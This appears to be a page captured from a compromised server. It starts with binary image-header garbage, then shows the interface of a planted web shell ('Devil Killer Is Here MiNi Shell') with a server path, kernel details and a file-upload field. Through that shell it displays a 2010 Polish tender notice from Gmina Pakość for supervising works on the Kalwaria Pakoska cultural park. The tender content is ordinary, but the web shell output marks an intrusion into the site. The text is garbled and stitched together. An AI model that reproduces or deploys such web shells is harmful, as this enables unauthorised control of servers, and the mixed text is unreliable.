JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101004/317290-N-2010.html

<p class="kh_header"><b>Pakość: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego, Archeologicznego i Konserwatorskiego nad inwestycją pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk</b><br>
<b>Numer ogłoszenia: 317290 - 2010; data zamieszczenia: 04.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pakość , ul. Rynek 4, 88-170 Pakość, woj. kujawsko-pomorskie, tel. 052 5666073 (74), 5666089, faks 052 5666075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pakosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego, Archeologicznego i Konserwatorskiego nad inwestycją pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji nadzorczych nad robotami budowlanymi dla Projektu pn.:  Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk. 
Przedmiot zamówienia jako całość dotyczy następujących branż specjalności:

- konstrukcyjno - budowlanej  robót kubaturowych  
-drogowej 
-kanalizacyjnej
- sieci i instalacji elektrycznych -obejmującej instalacje elektryczne, napowietrzne i kablowe linie  
  energetyczne, stacje i urządzenia elektroenergetyczne i oświetleniowe 
-teletechnicznej 
-z zakresu terenów zielonych objętych ochroną konserwatora przyrody
-konserwatorskiej 
-archeologicznej 
-rzeczowego i finansowego rozliczenia Projektu 
Uwaga: 
Zamawiający dopuszcza łączenie funkcji inspektorów nadzoru poszczególnych branż wymienionych powyżej pod warunkiem wykazania się niezbędnymi uprawnieniami do kierowania i nadzorowania robotami w każdej z łączonej branży. (Jedna osoba może pełnić funkcję maksymalnie dwóch inspektorów). 
 Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.

2. Przedmiot zamówienia dzieli się na następujące części:
a)	część I   dotyczącą pełnienia funkcji Inspektora Nadzoru Inwestorskiego;
b)	część II  dotyczącą pełnienia funkcji Inspektora Nadzoru Archeologicznego;
c)	część III dotyczącą pełnienia funkcji Inspektora Nadzoru Konserwatorskiego.

2.a) CZĘŚĆ I -NADZÓR INWESTORSKI
Zakres nadzoru inwestorskiego obejmuje następujące branże:
1) konstrukcyjno - budowlanej robót kubaturowych  
2)drogowej 
3)kanalizacyjnej, 
4) sieci i instalacji elektrycznych -obejmującej instalacje elektryczne, napowietrzne i kablowe linie   
    energetyczne, stacje i urządzenia elektroenergetyczne i oświetleniowe 
5) teletechnicznej 
6) z zakresu terenów zielonych objętych ochroną konserwatora przyrody 
7) rzeczowego i finansowego rozliczenia Projektu

1.Inspektor Nadzoru Inwestorskiego jest upoważnionym Przedstawicielem Zamawiającego pełni funkcję (Inwestora Zastępczego) i winien wypełniać swoje obowiązki zgodnie z warunkami umowy. Godziny pracy Inspektora Nadzoru muszą być dostosowane do czasu pracy wykonawców robót. Przez czas wykonywania robót branżowych winien być obecny Inspektor odpowiedzialny za nadzór danej branży.

.	Inwestor zastępczy działa na rzecz, rachunek i w imieniu zamawiającego.
.	Umowy o wykonanie prac i robót w fazie przedprojektowej, projektowej, budowlanej lub z dostawcami podpisuje zamawiający.
.	Inwestor zastępczy jest pełnomocnikiem przedstawicielem zamawiającego z upoważnieniami określonymi w zawartej z zamawiającym umowie.
.	Inwestor zastępczy ponosi wobec zamawiającego odpowiedzialność za wyrządzenie szkody będącej normalnym następstwem nienależytego wykonania obowiązków nałożonych na niego w zawartej z zamawiającym umowie, ocenianą w granicach starannego działania. Nie ponosi natomiast odpowiedzialności za niewykonanie lub nienależyte wykonanie zobowiązań dostawców, wykonawców, usługodawców, chyba że było ono wynikiem jego nienależytego działania.
.	Zamawiający sam dysponuje środkami finansowymi nie przekazując ich inwestorowi zastępczemu.
.	Inwestor zastępczy ma ograniczoną swobodę powierzania innym jednostkom wykonania czynności objętych umową zawartą z zamawiającym.Wymagane raporty miesięczne:
Wykonawca w ciągu 3 dni po zakończeniu każdego miesiąca przedłoży Kierownikowi Referatu Komunalno - Inwestycyjnego, Rolnictwa i Ochrony Środowiska Urzędu Miejskiego w Pakości Raport miesięczny wyszczególniający wykonane przez zespół ekspertów prace i kontrolne badania laboratoryjne oraz poinformuje o postępie robót, uzyskiwanym poziomie jakości robót, sprawach finansowych oraz występujących problemach w realizacji umowy na roboty budowlane.
Raport będzie zawierał:
   - opis postępu robót i powstałych problemów,
   - zaangażowanie sił i środków Wykonawcy robót budowlanych,
   - zaangażowanie finansowe,
   - postęp robót i płatności w podziale na kategorie robót w powiązaniu z planem na każdy miesiąc,
   - plan robót i finansów na kolejny miesiąc,
   - graficzne przedstawienie postępu robót w powiązaniu z harmonogramem,
   - graficzną prezentację postępu robót na planie lub rysunkach obiektów, 
   - fotografie dokumentujące postęp robót,
   - wykaz zmian z podaniem ich wartości,
   - wykaz roszczeń i etap ich rozpatrzenia.
      Raport techniczny:
Wykonawca przygotuje (wtedy, kiedy to konieczne) raport informujący o problemach technicznych, jakie wystąpiły w trakcie realizacji robót. Taki raport będzie wymagany, kiedy wystąpią poważne zmiany w dokumentacji projektowej.
Powinien zawierać:
   - założenia na podstawie których została opracowana dokumentacja projektowa, 
   - zestawienie wszystkich nowych założeń projektowych konieczne do oceny zaproponowanej  
     zmiany,
   - zestawienie rysunków powykonawczych pokazujących lokalizację i szczegółowe wymiary  
      wszystkich wykonanych robót do dnia sporządzenia raportu,
   - kopie wszystkich wcześniej zatwierdzonych zmian projektowych i innych zmian,
   - kopie kalkulacji cen jednostkowych z oferty Wykonawcy robót budowlanych, które będą 
     występowały w związku z wprowadzaną zmianą,
   - opis przyjętych prawidłowych założeń i różnice w założeniach projektowych w oryginalnych, 
     ofertowych rozwiązań,
   - nowy przedmiar pozycji kosztorysowych i koszty odpowiadające proponowanym zmianom 
     projektowym w porównaniu z ofertą Wykonawcy robót budowlanych,
   - rysunki pokazujące dokładną lokalizację proponowanych zmian projektowych.
      Raport końcowy:
Po zakończeniu okresu robót budowlanych, przed ostatecznym odbiorem robót, Wykonawca winien przygotować zwięzły końcowy raport z zakończenia kontraktu. Raport ten powinien zawierać opis metod zastosowanych w trakcie realizacji, ocenę pracy Wykonawcy, uzyskane efekty rzeczowe i jakościowe oraz rekomendacje na przyszłe  projekty o podobnym charakterze robót i złożoności do wykorzystania przez Zamawiającego. Po zakończeniu okresu robót budowlanych, przed ostatecznym odbiorem robót, Wykonawca winien przygotować także dokumentację powykonawczą w trzech (3) egzemplarzach.
CZĘŚĆ II -NADZÓR ARCHEOLOGICZNY
W zakres II części przedmiotu zamówienia wchodzi pełnienie stałego nadzoru archeologicznego, przeprowadzanie badań archeologicznych oraz opracowania przewidzianej przepisami prawa niezbędnej dokumentacji archeologicznej dla inwestycji pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk

Zamawiający dla nadzoru archeologicznego ustanawia następujący zakres rzeczowy:
a) uzyskanie: opinii Wojewódzkiego Konserwatora Zabytków wymaganej do otrzymania decyzji, zgody   
    konserwatora na wejście w teren z pracami archeologicznymi, uzyskanie zgody na zmagazynowanie  
    zabytków,
b) powiadomienie Wojewódzkiego Konserwatora Zabytków o rozpoczęciu prac archeologicznych,
c) uzgadnianie z inwestorem i wykonawcą ewentualnych robót dodatkowych lub zamiennych oraz ich 
    rozliczania, 
d) obserwacja stanowiska, analiza w terenie, sporządzenie dokumentacji polowej w trakcie nadzoru 
    archeologicznego,
e) powiadomienie Wojewódzkiego Konserwatora Zabytków o dacie zakończenia nadzoru 
   archeologicznego
f) wystawienie dokumentu o zakończeniu prac archeologicznych lub wpisanie uwag do dziennika   
    budowy
g) obsługa okresu gwarancyjnego i rękojmi, 
h)  sprawdzanie i odbiór robót zanikających, 
i) udział w naradach koordynacyjnych i roboczych na budowie bez prawa podejmowania decyzji 
   wiążących się ze skutkami finansowymi,
j) bieżąca współpraca z Inwestorem na etapie realizacji zadania, 
 k) wykonywanie innych czynności o ile przepisy prawa budowlanego lub ustawy o ochronie zabytków  
    nakładają obowiązek ich wykonywania w ramach nadzoru nad wykonawstwem zadania, 
l) nadzór nad treścią merytoryczną opracowań historycznych,
 m) udział w sporządzeniu rozliczenia końcowego zadania,
 n) sporządzenie pełnej dokumentacji naukowej w 2 egzemplarzach w wersji papierowej i 1 egz. w  
     formie elektronicznej oraz przekazanie ich do archiwum Wojewódzkiemu Konserwatorowi Ochrony  
     Zabytków i Zamawiającemu,
o) przekazanie do konserwacji uzyskanych podczas prac ziemnych zabytków archeologicznych a  
    następnie przekazanie zabytków po wykonanej konserwacji konserwatorowi lub innej wyznaczonej  w  
   decyzji jednostce naukowej.


1.Nadzór archeologiczny, prowadzone badania archeologiczne mają być wykonywane w obrębie Parku Kulturowego Kalwaria Pakoska, w miejscach przeprowadzania prac budowlanych wskazanych w decyzjach zezwalających na budowę oraz w decyzjach, opiniach i uzgodnieniach Kujawsko - Pomorskiego Wojewódzkiego Konserwatora Zabytków, pozwoleniu na prowadzenie badań archeologicznych oraz innych dokumentach związanych z inwestycją pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk oraz opracowanie przewidzianej przepisami prawa niezbędnej dokumentacji archeologicznej. Powyższe nastąpi zgodnie z wytycznymi zawartymi w ustawie z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz.U.03. Nr 162.poz.1568 ze zm.) oraz  Rozporządzeniu Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U.04. Nr 150. poz. 1579) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych.
Inspektor nadzoru Archeologicznego odpowiedzialny jest za przygotowanie wniosku i uzyskanie pozwolenia na prowadzenie badań archeologicznych. 
Usługa nadzoru archeologicznego rozpoczyna się na etapie złożenia oświadczenia o przyjęciu funkcji Inspektora Nadzoru Archeologicznego nad inwestycją. Wykonawca zobowiązany jest do dokumentowania wykonywanych przez siebie czynności w ramach nadzoru i badań archeologicznych oraz przekazywania w niezbędnym zakresie dokumentacji Zamawiającemu. Sporządzenie dokumentacji powykonawczej, szczegółowy zakres prac budowlanych, dla którego będą prowadzone prace archeologiczne wynikające z Decyzji  nr 74 2009 Wojewody Kujawsko-Pomorskiego, Decyzji 67 2009 Starosty Inowrocławskiego, Decyzja Starosty Inowrocławskiego z dnia 8 lutego 2010 roku w sprawie zmiany decyzji.

 2. Dokumentację     powykonawczą      będącą      konsekwencja        realizacji     umowy    Wykonawca       
sporządzi w 3 egzemplarzach oraz w wersji  elektronicznej,  zgodnie   ze   standardem   przyjętym   w    załączniku do Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich  i  architektonicznych,  a  także innych działań przy zabytku  wpisanym   do   rejestru zabytków   oraz   badań   archeologicznych  i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004 roku Nr 150, poz. 1579).
3. Ustala się następujące terminy realizacji prac : 
   -praca    Inspektora    Nadzoru   Archeologicznego   rozpoczyna  się z dniem złożenia oświadczenia o    
    przyjęciu czynności Inspektora Nadzoru Archeologicznego nad inwestycją. 
   -Inspektor  Nadzoru  Archeologicznego   zobowiązany  jest  w  okresach   miesięcznych   informować  
    Zamawiającego o stanie  zaawansowania  prac  w  terminie   do  5    dni   po   zakończeniu   miesiąca  
    sprawozdawczego. Nie   wykonanie   tego  warunku może być podstawą do  zerwania umowy z winy  
    Wykonawcy.
4. Termin zakończenia przedmiotu umowy planuje się na dzień 30 września 2012r. 
5. Jako termin zakończenia przedmiotu zamówienia, Zamawiający przyjmuje protokolarne przekazanie w  
    siedzibie zamawiającego, dokumentacji powykonawczej.
6.Wraz   z   wykonaną   dokumentacją   Wykonawca   przekaże   Zamawiającemu  spis dokumentacji oraz  
   oświadczenie o jej kompletności.
7. Wykonawca   winien   dysponować  osobami zdolnymi do wykonywania zamówienia, a co oznacza, że  
    osoba która będzie je realizować mają posiadać odpowiednie uprawnienia do pełnienia funkcji nadzoru  
    archeologicznego. Informacje na temat kwalifikacji tych osób (uprawnień   wraz   z   informacjami   na 
    temat ich kwalifikacji zawodowych,   doświadczenia   i   wykształcenia   niezbędnych   do   wykonania 
    zamówienia,  aktualny   dokument   potwierdzający   przynależność   do   właściwej   Izby   Inżynierów 
    Budownictwa - zaświadczenie  aktualne na dzień składania ofert a także zakresu wykonywanych przez 
    nie  czynności  oraz  informacji  o  podstawie  dysponowania   tymi  osobami)   wykonawca   dostarczy 
    Zamawiającemu  przed  podpisaniem  umowy. Wykonawca  musi  mieć  do   dyspozycji   odpowiednio 
    wykwalifikowaną osobę t.j.:
inspektor nadzoru archeologicznego (stały nadzór)- minimum 1 osoba z uprawnieniami do nadzorowania  prac ziemnych oraz doświadczeniem w branży minimum 3 lata (od uzyskania uprawnień) na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy robót danej branży

2.c) CZĘŚĆ III -NADZÓR KONSERWATORSKI

Przedmiotem III części zamówienia będzie pełnienie obowiązków Inspektora Nadzoru Konserwatorskiego przy realizacji inwestycji pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk, a w tym:
a) uczestniczenie   w   pracach Komisji   Przetargowej   w   ramach   sprawdzenia   zgodności ofert ze Specyfikacją Istotnych Warunków Zamówienia
b) udział w ocenie wykonanych projektów budowlanych i innych opracowań projektowych, 
c) udział w przekazywaniu placu i terenu budowy, 
c) kontrolowanie zgodności robót z kosztorysem ofertowym, 
d) kontrolowanie rozliczeń robót od strony ilościowej oraz kosztowej, 
e) sprawdzanie postępu robót, dokonywania odbiorów częściowych, 
f) sporządzanie meldunków z zaawansowania rzeczowo - finansowego robót, 
g) uzgadnianie z inwestorem i wykonawcą ewentualnych robót dodatkowych lub zamiennych oraz ich   
    rozliczania, 
h) sprawdzanie i odbiór robót zanikających, 
i) udział w naradach koordynacyjnych i roboczych na budowie bez prawa podejmowania decyzji 
   wiążących się ze skutkami finansowymi, 
j) sprawdzanie kosztorysów po wykonaniu robót i faktur za wykonane roboty i dostawy, 
k) sprawdzanie kompletności operatu powykonawczego, 
l) udział w sporządzeniu rozliczenia końcowego zadania, 
m) realizacja praw i obowiązków wynikających z art. 26 ustawy Prawo budowlane oraz rozporządzenia 
     Ministra Kultury z dnia 9.06.2004 w sprawie prowadzenia prac konserwatorskich, restauratorskich,  
     robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku 
     wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych  
     zabytków ruchomych (Dz.U.04.150.1579), odnośnie zadań inspektora nadzoru konserwatorskiego,     n) obsługa okresu gwarancyjnego i rękojmi, 
o) bieżąca współpraca z Inwestorem na etapie realizacji zadania, 
p) wykonywanie  innych  czynności  o  ile  przepisy prawa budowlanego lub ustawy o ochronie zabytków 
    nakładają obowiązek ich wykonywania w ramach nadzoru nad wykonawstwem zadania, 
r) nadzór nad treścią merytoryczną opracowań historycznych.
s) składanie wniosku o wydanie pozwolenia na prowadzenie robót budowlanych (prac konserwatorskich)  na terenie zabytkowym.
Usługa nadzoru konserwatorskiego rozpoczyna się na etapie złożenia oświadczenia o przyjęciu funkcji Inspektora Nadzoru Konserwatorskiego nad inwestycją. Wykonawca zobowiązany jest do dokumentowania wykonywanych przez siebie czynności w ramach nadzoru oraz przekazywania w niezbędnym zakresie dokumentacji Zamawiającemu. Sporządzenie dokumentacji powykonawczej, szczegółowy zakres prac budowlanych, dla którego będą prowadzone prace konserwatorskie  wynikające z Decyzji  nr 74 2009 Wojewody Kujawsko-Pomorskiego, Decyzji 67 2009 Starosty Inowrocławskiego, Decyzja Starosty Inowrocławskiego z dnia 8 lutego 2010 roku w sprawie zmiany decyzji.
Wykonawca winien dysponować osobami zdolnymi do wykonywania zamówienia, a co oznacza, że osoba która będzie je realizować mają posiadać odpowiednie uprawnienia do pełnienia funkcji nadzoru konserwatorskiego. Informacje na temat kwalifikacji tych osób (uprawnień wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, aktualny dokument potwierdzający przynależność do właściwej Izby Inżynierów Budownictwa - zaświadczenie aktualne na dzień składania ofert a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie dysponowania tymi osobami) wykonawca dostarczy Zamawiającemu przed podpisaniem umowy. Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowaną osobę t.j.:
inspektor nadzoru konserwatorskiego (stały nadzór)- minimum 1 osoba z uprawnieniami do nadzorowania  prac konserwatorskich przy zabytkach nieruchomych oraz doświadczeniem w branży minimum 3 lata (od uzyskania uprawnień) na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy robót danej branży.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.35.61.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w zakresie I części przedmiotu zamówienia: 10.000,00 zł, 
(słownie: dziesięć tysięcy złotych00/100);
 w zakresie II części przedmiotu zamówienia: 2.500,00 zł, 
(słownie: dwa tysiące pięćset złotych00/100);
 w zakresie III części przedmiotu zamówienia: 2.500,00zł, 
(słownie: dwa tysiące pięćset złotych00/100);</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy potwierdzić w oświadczeniu na podstawie art. 22 ust. 1 w związku z art. 44 (załącznik do SIWZ) Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>cena spełniania warunków j.w. dokonana zostanie zgodnie z formułą  spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ. Z treści załączonych dokumentów (o których mowa w wykazie oświadczeń i dokumentów  zamieszczonym w rozdz. VI. SIWZ) musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.
Wykaz wykonywanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi wykonano lub są wykonywane należycie- 
Wykonawcy składają w ofercie wykaz uzupełniony wg załącznika nr 4 (doświadczenie wykonawcy i podwykonawcy) do SIWZ oraz referencje. Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej jednej usługi dotyczącej:
-dla części I przedmiotu zamówienia:
a) w specjalności konstrukcyjno - budowlanej, minimum jedna
b) w specjalności  drogowej - minimum  jedna  referencja  stwierdzająca,   że  usługi   wykonano   lub   są 
    wykonywane należycie
c) w zakresie  sieci,  instalacji  i  urządzeń  cieplnych,   wentylacyjnych,   gazowych,    wodociągowych   i 
     kanalizacyjnych - minimum    jedna    referencja    stwierdzająca,   że    usługi     wykonano     lub     są  
     wykonywane należycie
d) instalacje elektryczne, napowietrzne i kablowe linie energetyczne, stacje i  urządzenia  minimum  jedna 
    elektroenergetyczne i oświetleniowe - minimum jedna  referencja  stwierdzająca,  że  usługi  wykonano  
    lub są wykonywane należycie
e) w  zakresie  branży  teletechnicznej - minimum jedna referencja stwierdzająca, że usługi wykonano lub 
    są wykonywane należycie
f) zabezpieczenia, uzupełnienia, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju 
    zorganizowanej zieleni zabytkowej-  minimum jedna referencja stwierdzająca, że usługi wykonano lub   
    są wykonywane należycie 
g) rozliczania projektów unijnych o charakterze infrastrukturalnym -minimum jedna końcowo rozliczona inwestycja infrastrukturalna  - minimum jedna referencja stwierdzająca, że usługi wykonano należycie 
-dla części II przedmiotu zamówienia:
a) w specjalności konserwatorskiej przy zabytkach nieruchomych - minimum jedna referencja stwierdzająca, że usługi wykonano lub są wykonywane należycie
-dla części III przedmiotu zamówienia:
a) w specjalności archeologicznej - minimum jedna referencja stwierdzająca, że usługi wykonano lub 
    są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków j.w. dokonana zostanie zgodnie z formułą  spełnia - nie spełnia  w  oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ. Z treści załączonych dokumentów (o których mowa w części SIWZ: G. Dokumenty wymagane w ofercie) musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.
2.W celu wykazania spełnienia powyższego warunku Wykonawca przedkłada:
Wykonawcy załączają wykaz osób (poprzez uzupełnienie załącznika nr 6 do SIWZ- Wykaz osób) , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
1) dla części I przedmiotu zamówienia:
